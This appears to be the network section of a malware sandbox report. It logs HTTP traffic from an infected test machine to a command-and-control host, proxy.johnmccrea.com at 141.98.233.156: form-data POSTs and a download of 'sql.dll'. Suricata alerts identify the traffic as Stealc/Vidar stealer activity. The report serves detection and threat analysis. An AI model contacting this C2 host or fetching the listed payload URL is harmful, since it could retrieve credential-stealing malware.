Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
proxy.johnmccrea.com | 141.98.233.156 |
GET
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Host: proxy.johnmccrea.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDB
Host: proxy.johnmccrea.com
Content-Length: 256
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDG
Host: proxy.johnmccrea.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKECGHCFIJDAAKFHJJDH
Host: proxy.johnmccrea.com
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEB
Host: proxy.johnmccrea.com
Content-Length: 332
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CGDHDHJEBGHJKFIECBGC
Host: proxy.johnmccrea.com
Content-Length: 4313
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET
200
http://proxy.johnmccrea.com//sql.dll
REQUEST
RESPONSE
BODY
GET //sql.dll HTTP/1.1
Host: proxy.johnmccrea.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:12 GMT
Content-Type: application/octet-stream
Content-Length: 2459136
Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT
Connection: keep-alive
ETag: "6560a86a-258600"
Accept-Ranges: bytes
POST
200
http://proxy.johnmccrea.com/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
Host: proxy.johnmccrea.com
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 05 Oct 2024 02:33:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49166 -> 141.98.233.156:80 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | A Network Trojan was detected |
TCP 141.98.233.156:80 -> 192.168.56.103:49166 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | Malware Command and Control Activity Detected |
TCP 141.98.233.156:80 -> 192.168.56.103:49166 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | Malware Command and Control Activity Detected |
TCP 141.98.233.156:80 -> 192.168.56.103:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 141.98.233.156:80 -> 192.168.56.103:49166 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts